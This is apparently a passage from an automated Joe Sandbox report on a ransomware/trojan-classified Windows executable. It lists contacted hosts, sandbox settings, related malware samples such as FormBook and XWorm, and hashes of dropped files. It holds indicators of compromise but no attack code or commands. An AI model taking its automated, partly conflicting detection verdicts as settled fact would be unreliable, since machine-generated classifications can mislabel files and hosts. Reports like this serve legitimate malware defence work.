                                      http://defaultcontainer/tempfiles/sample.psmdcpUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://defaultcontainer/package/services/metadata/core-properties/0efccca87b4345efa345d5a58c8332f0.pUpdate.exe, 00000002.00000002.1680892254.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002997000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                      16.12.1.14 | s3-r-w.sa-east-1.amazonaws.com | United States | | unknown | unknown | false
                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1404607
                                      Start date and time:2024-03-07 10:35:11 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 22s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:22
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:00023948209303294#U00ac320302282349843984903.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:00023948209303294320302282349843984903.exe
                                      Detection:MAL
                                      Classification:mal80.rans.troj.evad.winEXE@25/60@1/1
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240s for rundll32
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target Update.exe, PID 6772 because it is empty
                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      TimeTypeDescription
                                      10:36:16API Interceptor1x Sleep call for process: rundll32.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      16.12.1.14hyh6728i0zbnnp rspehu.msiGet hashmaliciousUnknownBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        s3-r-w.sa-east-1.amazonaws.com0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                        • 3.5.232.21
                                        0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                        • 3.5.234.1
                                        0923840932020004-3-0.exeGet hashmaliciousUnknownBrowse
                                        • 3.5.232.185
                                        WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                        • 52.95.163.114
                                        WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                        • 16.12.0.34
                                        DOC7186723912#U0370.msiGet hashmaliciousHidden Macro 4.0Browse
                                        • 52.95.164.60
                                        DOC0974045396#U0370.msiGet hashmaliciousHidden Macro 4.0Browse
                                        • 52.95.164.98
                                        file.msiGet hashmaliciousHidden Macro 4.0Browse
                                        • 52.95.164.11
                                        F#U00b498074756.msiGet hashmaliciousHidden Macro 4.0Browse
                                        • 52.95.164.122
                                        https://dismelo.com.brGet hashmaliciousUnknownBrowse
                                        • 16.12.0.2
                                        No context
Match: 37f463bf4616ecd445d4a1937da06e19

| Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|
| Purchase List.vbs | malicious | FormBook, GuLoader | 16.12.1.14 |
| Update.js | malicious | SocGholish | 16.12.1.14 |
| 6009287162.vbs | malicious | XWorm | 16.12.1.14 |
| 6009287162.vbs | malicious | XWorm | 16.12.1.14 |
| SW_PC_Interact2.3.5_Build6.exe | malicious | DBatLoader | 16.12.1.14 |
| 6009287162.vbs | malicious | XWorm | 16.12.1.14 |
| Condensers.exe | malicious | FormBook, GuLoader | 16.12.1.14 |
| PDFCreator-1_5_0_setup.exe | malicious | Unknown | 16.12.1.14 |
| factura-022853.exe | malicious | FormBook, GuLoader | 16.12.1.14 |
| OKaDvPJcTF.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, PureLog Stealer | 16.12.1.14 |
                                        No context
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):760632
                                        Entropy (8bit):6.295643740329593
                                        Encrypted:false
                                        SSDEEP:12288:wMpm8zQAic9BZFiiNtmWFD7U0RJrs6aEYaTC7wdX5BYblG9N:rl/wiTP1JRJKEYaTC7wdX52hI
                                        MD5:F239F9186BBF10EF438B0B0C5A71D9A9
                                        SHA1:6B1B562C59121049BF5C15187DE51A507710E5D7
                                        SHA-256:5CD5193B50CEBEFB65DDFA227E2806425B35327D6B545145C6E65A946ED43928
                                        SHA-512:7F63EC4ACE5679C6C2775CFDC7C21F77D0481BF779C78B51D2806551B61AD5E39D18E1786BD9A0DB968AFB2A1279C7543D7067B84B4907A2817D4FFE737F5F94
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 3%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):885560
                                        Entropy (8bit):6.030254768387881
                                        Encrypted:false
                                        SSDEEP:12288:fF6mgUVLctszL5BffCerxb+sNs/qOGiHR5BYblGx:f9hVLctQL5Bnfrxb+sNQ5HR52he
                                        MD5:A7BDF136014CC2BE258CCAC078F437EB
                                        SHA1:EF1108633774F52E406F2A787A2102035DB21858
                                        SHA-256:363809B264B915BD640580F05195A61F308B351555667072239835EC51F4405C
                                        SHA-512:C90637F3D5D6892ABDEF506566B130D6816CE0BA8C9F6506742144B63678B22E80CE7839DCF7B9BCBAE53BD4E8C355781B06A9B64CBBD1B901176B1779FB5B8D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 3%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):98616
                                        Entropy (8bit):6.05086836225285
                                        Encrypted:false
                                        SSDEEP:1536:HpotLuQVD29umGs9wT4I9H+e3Wvv7dgKwd9ndX3rDw6:4L8v2H+jvv7mX7Dw6
                                        MD5:3DB84D449984C7E980C25DA3F265186D
                                        SHA1:FF99DF916A31393E569ED9CC7C10215811DCFCFC
                                        SHA-256:58B62BA62C53CCED2B8AC6AFAF730E04616F574D63A69E50732F13FA2FDC0F85
                                        SHA-512:3ADEDD69871D772479720557939EDB86AF3A805924567D310BCF73D1F8C36530EB213F63A59A309A4EDAB57C96368819F30E02D304FDF2EFB95F0FCEB1392028
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):507192
                                        Entropy (8bit):6.331523727596564
                                        Encrypted:false
                                        SSDEEP:6144:jRV3H1qXVdC9lIltuTHkHuwXJpJIOhqr5LEE81954gJbbB1I:jRV3HMVdCTIlUTHkH/XJpS8qr9G5BJbM
                                        MD5:D82C55EF5C9F4DEA2151907D45040B4A
                                        SHA1:605AAAD9C12AB3FD3A44C9B9ADBFD9C75196D565
                                        SHA-256:336F2689D81BC7C2B623C1E1FB67B6D32D4B615DCCE94DC9E37ED9E1BF59EAC7
                                        SHA-512:F8D7BF2397E73DD718B4553F45C2B28CBB44834992DA87832EE71D686C845938B068A2BE34AF4366CCB5894618D89FC5D911D04CD1E0461F7096243D6C94CFE1
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):292352
                                        Entropy (8bit):6.291424923805442
                                        Encrypted:false
                                        SSDEEP:6144:P+EhZJuiWErKqa2ayOpH6X0v9oh/BBGGUOO:GEdyErYWOpz9o7De
                                        MD5:9534F7D1F6BA24DB066355BBC9B54838
                                        SHA1:10374B028B7052A18D1AE64C5B9962F37D0E79F5
                                        SHA-256:6A7E6DE75E34DC410F50823E92DF4F6C6E45025433D1328B7133BF4CB1010D28
                                        SHA-512:13B5703C02B3C3FFE54AEC7FFC59CB20E7819261F6B3B3F0F5A62A92F0D19127D2892C2E91544FB52BD187882D8DCCC1FCE796A3D28D4BFB3ABAD33E88024D55
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Virustotal, Detection: 17%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):104248
                                        Entropy (8bit):6.034633491813912
                                        Encrypted:false
                                        SSDEEP:1536:R/3PSNKe2wmLlIUa22Ud1FRyLoXCsY++3Wvv7dgKwd9nxCNf:R/qTmLKuNLY+Dvv7uCNf
                                        MD5:A1C24588503CD2C1690EF94BBF341829
                                        SHA1:5368795D2A0C0BC404EF2D108A4812979F4544F5
                                        SHA-256:F37F3BD363D1695E0A151C3302FCFB8BE770EB107B066D05F10C4FB6C946318F
                                        SHA-512:7C2E079DD59CD3C905DB6EF1C41356D38E000C9D1FC7E4867BE4B2039BA866871F310C096B29B93D07B71B52B78AC9274FFB77A8257F4A8D7DDF8DD4AF8B4B7F
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):32435238
                                        Entropy (8bit):1.2710100369600539
                                        Encrypted:false
                                        SSDEEP:49152:407uhAXR+1pD7HB9Ke2It1A8nrpaSwm19ATXykaoQCRb/JTW8kip:z7y1pTKevI9BT9b
                                        MD5:42D43DC42198364FE4543E9265FDD8D5
                                        SHA1:333A60BCA6CE1D7BD4C631D04297BD4EC77618A9
                                        SHA-256:B2B24F67B78FBBA6B605767AC4DDE4CE794D6B279A179A5485A21B7AA6249A11
                                        SHA-512:00508389F85354F6AB501FA29A7FBD492C1A0C161FCD3C1F7EE4DD0E7C29A045A8B1973353A2E3FA7DE7F6AC6ED9C97C03BA89A8A8D7BC1924C2C8E56B31B1E8
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Virustotal, Detection: 18%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):103736
                                        Entropy (8bit):5.912660682474699
                                        Encrypted:false
                                        SSDEEP:1536:OSz4xjHKQ9M2Q2ejqU0Fe/jPbnKaKlyXdWRpew3Wvv7dgKwd9nxCC:OSz4xjHK12QmPM/jPRXd0pOvv7uCC
                                        MD5:CCCA2C0E6653506652437868D1049817
                                        SHA1:C3B56B86ACE2FA1ADDDE2EC81D0087D31E12CF80
                                        SHA-256:625BB2074498952E01A21C2D54B9B9A4C0841F743E038799B907126980A984BE
                                        SHA-512:CC8E9B84AEAB7044829605BF7329EECCC9C8B595393B037FC5259CABE0D7BBCA07C559C8D2FB67282E482C3F369AB0B9F5236FE9D2E83F8D4110B822E6781F10
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:MS Windows HtmlHelp Data
                                        Category:dropped
                                        Size (bytes):1585627
                                        Entropy (8bit):7.995160864775383
                                        Encrypted:true
                                        SSDEEP:49152:1mpETL+Y3zUHQu0u7LPe1Ak9cbPzs/kd8ZsGOh3smmIIEB:1mpEmYAHL0uvPeMLs/edsFY
                                        MD5:251138D2F6A0CA903370941D90E6479B
                                        SHA1:840BAAC95310FEBBC209FEE2F6E375F752117F3E
                                        SHA-256:0CC0453C66731CE5A04FB86C65C1434BA8B0CE58F5D677B2C41E546E35C06BD0
                                        SHA-512:861453B90C30D87949E9C7E23EAC24A2B1CB1732B27AE4DC3FD404A0AB2F9E7706FD3CE4FD045650C70A1D4216610DFAECCC6BC6A4D9EF10CCBF48866F7B3755
                                        Malicious:false
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                        Category:dropped
                                        Size (bytes):96473
                                        Entropy (8bit):5.013468996514304
                                        Encrypted:false
                                        SSDEEP:768:lWr3D3DOCwcwxA1zK48IVT2CsjfjKGwI+X0IjpqsqqqCKAoCk4O6CMqBjLW5qo/e:lWHsy9NOqj/DM
                                        MD5:D00CE44FF320F14EE7B733B3C78AE615
                                        SHA1:625DAA8A5958360EF2A667839C4324B6101CAF7D
                                        SHA-256:95F7362D6F5BD9F2174CA189369CE4D6E25069CDB48670B223399C0523D9D145
                                        SHA-512:1C97F17E61209523B47B7A5E1C72557C8795FB13FB72D5747510AE0134BA986308C1FB6B9DAC9A1D14949C60C6358CEA3B6969886726CDC59D21F0C7F923F0A3
                                        Malicious:false
                                        Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f36\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 0204050305040603
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):402744
                                        Entropy (8bit):6.23649982678044
                                        Encrypted:false
                                        SSDEEP:6144:bdM5fvstilELNbP86TAlLRH8F1954gYbAmNcFK7:bqlgilEpbP86Tq45BYbAK7
                                        MD5:4F0018CC8BA1F9FBA64A873FD526775E
                                        SHA1:B0C6788606318F064D9877E0C9D0459A5C34EB3A
                                        SHA-256:C3209FD73A748A066443CAF1A87D002451D67A33BA33B51BADFC181F25BD5603
                                        SHA-512:732B68C5A64E00B2706EE4B683D74BCA6877F6204D9B6E6B28D87574D3525C997FFDF5D05A9889951291EE42C4C45E00B726B5A1885D4C41380B41D4613A3122
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 1%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):163640
                                        Entropy (8bit):5.997314411159734
                                        Encrypted:false
                                        SSDEEP:3072:MLKDkNh+eE+AEvQmtMt5dZaFyCO6c7zlXLCHXTpEhfcvv7fFb:kK+vO7ZaFyCOl7IiNcbdb
                                        MD5:6776A3D1C644BFE33932189B00165CAF
                                        SHA1:C109B9B2F344748DAFF26FCC0B55FA0D2CF8322F
                                        SHA-256:A99ADF420EF6498E2E665703FCD1DC76BDBAA5A2E1F38D72F7229A9C3CD932E7
                                        SHA-512:4DB70C69BE312D8065B2013D0A83B235969C7F38B31A8C54C63F8F6C0A888F139DF45EEEB6C245BB7D4DD07F24A18BE9507C4A80DEE2CF4D274F7BC8CBBF8AA9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):3664696
                                        Entropy (8bit):6.362994861073782
                                        Encrypted:false
                                        SSDEEP:49152:1KLlaN5QY6eVmrOh2yxvV+4cjtnQ7luPEZuzWu204gw+5xDIoFLnnu:fZkmzALRA+0IDnu
                                        MD5:1434E96C86A3B5A9BA9C9A95F1BE1584
                                        SHA1:04C81A71E96940DDDC13A097BEF440343C8D197B
                                        SHA-256:3AD92E7759614D08395EBDEEC411035C7D68CB2FA7532B70FC564546F9DEC4B1
                                        SHA-512:9E9C37047671C5B67180612771D037D332139BA46C6CAC16196E9A863C120D4B45E72A287E6DF41759E04A990F9A77A04C1C841BB89FC6B88C69189A197601D4
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):103818
                                        Entropy (8bit):5.8928331157621825
                                        Encrypted:false
                                        SSDEEP:1536:/dlWdvXfn9mkt7wNVOL8gNn6pj5Iq8VIsj203XBnBG:/7NhNOf3j203O
                                        MD5:C89E164A7D30247919FAE38C7512AD24
                                        SHA1:F42BC1CDC66E4822DAE63F0AE2F640E4B217615A
                                        SHA-256:7974A14E02B91A3BCB1E15FCE3AAD7D640D2800989CDD1BA3C5A82F847DE5B98
                                        SHA-512:EAA448EC09EE02BFF711A2101303F80FC608F6D5B9760C3F3C963CC4D36C4F88EB4BDE16573955321F0166A171F4F98D3AE5A8AA805C5D972DE855491DC98031
                                        Malicious:false
                                        Preview:.; This file contains all localized text for Classic Explorer. There is one section per language...; Every section contains text lines in the form of <key> = <string>...; Which section is used depends on the current OS setting. If a key is missing from the language section..; it will be searched in the [default] section. In some cases more than one language can be used...; For example a Japanese system may use English as a secondary language. In that case the search order..; will be [ja-JP] -> [en-US] -> [default]...;..; =============================================================================......[default]..Toolbar.Settings = Classic Explorer Settings......[ar-SA] - Arabic (Saudi Arabia)..Copy.Cancel = ..... .......Copy.More = ...........Copy.CopyHere = .&.. ... ... ........Copy.MoveHere = .&.. ... ... ........Copy.Title = ..... ....... .......Copy.Subtitle = ..... ... ...... ... ... .... '%s
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):30324
                                        Entropy (8bit):4.099883635478519
                                        Encrypted:false
                                        SSDEEP:768:HU4oBvxuMlxssM5Rw3qR/4D/ZxKvcB7KZefKwaNg:HU4oBJ5qR/W/Zx/B9vaNg
                                        MD5:6B5068DB15113F6DC950330DE7BDD3DC
                                        SHA1:D5C4F6CB4FD5BD3BC64E4816D593841912030D42
                                        SHA-256:AA95EA793F6AB60080982BBE1AA3E9A9EB0E16A85C9DF45CD2F27E738C53E3C6
                                        SHA-512:CAB6AC0F01DCB500B34CB843B984810D5B268717D62B8DEAF2D2DECAD114B1DEDA0DB9E9DBA8A8716E437FEF57D46D64058EEE8A718CA39A07FAF5ABC4FC6A21
                                        Malicious:false
                                        Preview:===============================================================================..== Version 4.3.1 general release (Aug, 2017)..===============================================================================....- Official support for the Creators Update version of Windows 10....- Added a setting to clear icon cache....- Multiple minor improvements and bugfixes....===============================================================================..== Version 4.3.0 general release (Jul, 2016)..===============================================================================....- Official support for the Anniversary Update version of Windows 10....- Fixes for issues found during the 4.2.7 beta....===============================================================================..== Version 4.2.7 beta (May, 2016)..===============================================================================....- Fix for a crash on 32-bit Windows 10 systems....=======================================================
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Archive, ctime=Sun Jul 15 15:15:32 2018, mtime=Tue Feb 7 18:51:36 2023, atime=Sun Jul 15 15:15:32 2018, length=104248, window=hide
                                        Category:dropped
                                        Size (bytes):1318
                                        Entropy (8bit):4.456100530133193
                                        Encrypted:false
                                        SSDEEP:24:8LqIiRud/RoEAlKNUkMlpAEJKpyvEMa8WhVkMlcqdKLJaSAhAyvEMa8WWyuf:8LHiRud/cIUkMlqEYpyvvZkkMlcqdEyN
                                        MD5:A93AD8EEEEF5532F9CC99413B6B96793
                                        SHA1:20F0D35E41E0E7B876D5A066004B09E3E131F50D
                                        SHA-256:549B0BC14CF9F3BEF7EB7957EB5DCBA86A9C887B8C951F4CC11C015DF6842559
                                        SHA-512:130E3996606034E3548785B0ED29B2D423F8B27EDFF1FD841B2BE947BB682342950CB86864A97B27257A573EBAF942793FB74EF0258DCBE1FFA74C1542429BB3
                                        Malicious:false
                                        Preview:L..................F.... ....*..W.....4.-;...*..W...8............................P.O. .:i.....+00.../C:\.....................1......T.t..PROGRA~1..t.......C.l.T.t....................J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1.....GVs...CLASSI~1..L......oQb.GVs.............................~.C.l.a.s.s.i.c. .S.h.e.l.l.....n.2.8....L.. .CLASSI~2.EXE..R.......L..GVs......o....T...................C.l.a.s.s.i.c.I.E._.3.2...e.x.e.......^...............-.......]....................C:\Program Files\Classic Shell\ClassicIE_32.exe..C.E.d.i.t. .t.h.e. .s.e.t.t.i.n.g.s. .o.f. .t.h.e. .I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r. .t.i.t.l.e. .b.a.r. .a.n.d. .s.t.a.t.u.s. .b.a.r.....\.C.l.a.s.s.i.c.I.E._.3.2...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.l.a.s.s.i.c. .S.h.e.l.l.\.........&................c^...NI..e.2.......`.......X.......developer.........;.3L..,.{b..E...&...S..2.jA..;.3L..,.{b..E...&...S..2.jAo...........1SPS.....Oh.....+'..............D...E.d.
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):42014
                                        Entropy (8bit):7.98271695343675
                                        Encrypted:false
                                        SSDEEP:768:7cED9Ol6y+lL4bIPIE7fEUYdxAtitL1QhcnM4O4czzTJ7/TfD:77JOR+lwE/YdxJ1pM4O4kTJ7/n
                                        MD5:9773AD8D846E70082E18343CA42A12A7
                                        SHA1:F279150CAD325F91558921161C6699ACD8312EDC
                                        SHA-256:CB88AE5B29C0413CB7A8C988397B8868329F21BFC70B1A1D0E1B7257316E4DE9
                                        SHA-512:FCE598CC2C8D912AC55939640BE772804D568E05732E52E2A1D23D9BFD2F7253468128534E7EB4F10B9FDF57FA19C9B4D7F768C1EC02DC5679764AAFF3A62F1A
                                        Malicious:false
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):70656
                                        Entropy (8bit):5.579916080865678
                                        Encrypted:false
                                        SSDEEP:768:5cAeLn6Cc1ZoHhuGieMKqKf368f8ivaaGNNiiiZ3QMZ2B6mc5sHv42dN0nKsDEDA:a6CcARZ3RaaGNNiiiZ3Wvv7dgKwd9nL
                                        MD5:AA807C9F20014595E8BFDDF7F6DCA025
                                        SHA1:198BF64B5052E016272C2257A66E05062884CD39
                                        SHA-256:B47661C02468DC823350FCD9E348674E9B7A528127DF7D61B4289FEBA492AE03
                                        SHA-512:125F02C14CB9EB0E929B098B2DB219751A73B5F482FECFBDAD9584491D6AE508A59E6105B015804159024F8EFD686CD5BB1C8676D1FF270A8361252D1B96B9B9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):106496
                                        Entropy (8bit):4.710252310302198
                                        Encrypted:false
                                        SSDEEP:768:7LlnHhuGieMKqKf368f8ivaaGNNiiiwmzIimd3QMZ2B6mc5sHv42dN0nKsDEDQdM:9nRZ3RaaGNNiiiwfh3Wvv7dgKwd9nC
                                        MD5:ED0D00E6A9E83242634F6FFEA8A751F1
                                        SHA1:A80105BAD9E68EFFC17702C0029568F632F003FC
                                        SHA-256:992D573A7012C6777D127ED3DC1A5A5343DEE5E30EC7BBC3518ADAF3F28733A8
                                        SHA-512:AA25791215E419F11858984063A5ED75C1BB3E2A7136CC045E4D88E204687BB16342F954AA411B0F6DDA28550A851DF0E62FC79F574926F5BD237CBAD5EF0CC9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):403816
                                        Entropy (8bit):6.1451106536127735
                                        Encrypted:false
                                        SSDEEP:6144:z9eW9BpN1rKvfwOlWQb1MfMp7ZFfyjCrplIz5qyAlhAXnWPkzfo:zDKv4OlWQpMA7Z0Cr/e89QnWszfo
                                        MD5:FBAA9986931D1ADEDA07A6EF8F04AB6D
                                        SHA1:5FB959351940EB94EEF9D8E21D95436B77FEB9A2
                                        SHA-256:3B96D206B1BF06532440E2DD91B615A6CC8DD21561C252449F3B76FC254E11DF
                                        SHA-512:A88A56E30BEBF91CDB1382F46E2D095CBD20CA6ACDFBEF1998602AB7C744E6DECB6D80885CCE3CE1F97EBCBBDC5F90A6B192D8BE9C08DD4A2FC95F10AB2CC102
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):165208
                                        Entropy (8bit):7.110142692986595
                                        Encrypted:false
                                        SSDEEP:3072:vMxVQoQqFTs8U+Nwy8bhpgENIf5eeT25+h6+iU:v8s8tNwZhpgEKfEeT6m
                                        MD5:EBEA28C15DD26C1D0C1944215F0AAE8B
                                        SHA1:98375B311B8D56DA260961217073B30D1AEFE089
                                        SHA-256:E36CD8ABDA4C1E71C9E322550ECD3F6B76B1D6ACAD014F7DFA11F72A0ABC674B
                                        SHA-512:05E17C27A257229BD67096D0E2858C9A120293983F8F79AA9A884F97A4F867A00AD1ED7DEC846EC54F236B44802B7A6C57E752B81277510B90F930BDB6714F11
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):363520
                                        Entropy (8bit):6.133549908634759
                                        Encrypted:false
                                        SSDEEP:6144:U0AjlUbLwmHNdPEmf7FYbvESQWwYhli61KYCDbg:U0KlUAANdrDFYY/rDbg
                                        MD5:355ADAA13F7CEF714BFA1143678BADA1
                                        SHA1:64EE68DAE2709C1F4860343006EDF7949FA684EB
                                        SHA-256:0015E2E375366BCA981DC6CA6902AAA38C3C8B3F3E5DF9929489A0411C98487E
                                        SHA-512:3E601F0685BE2216AC5874A727C6E72995A2E0E782E6D877E801F6ADCE3360B7BD80F5860091A42ECFDF1AA326CE2560798D308ADCF77B9B56DD40A75F7F12C4
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):325632
                                        Entropy (8bit):5.238943133649953
                                        Encrypted:false
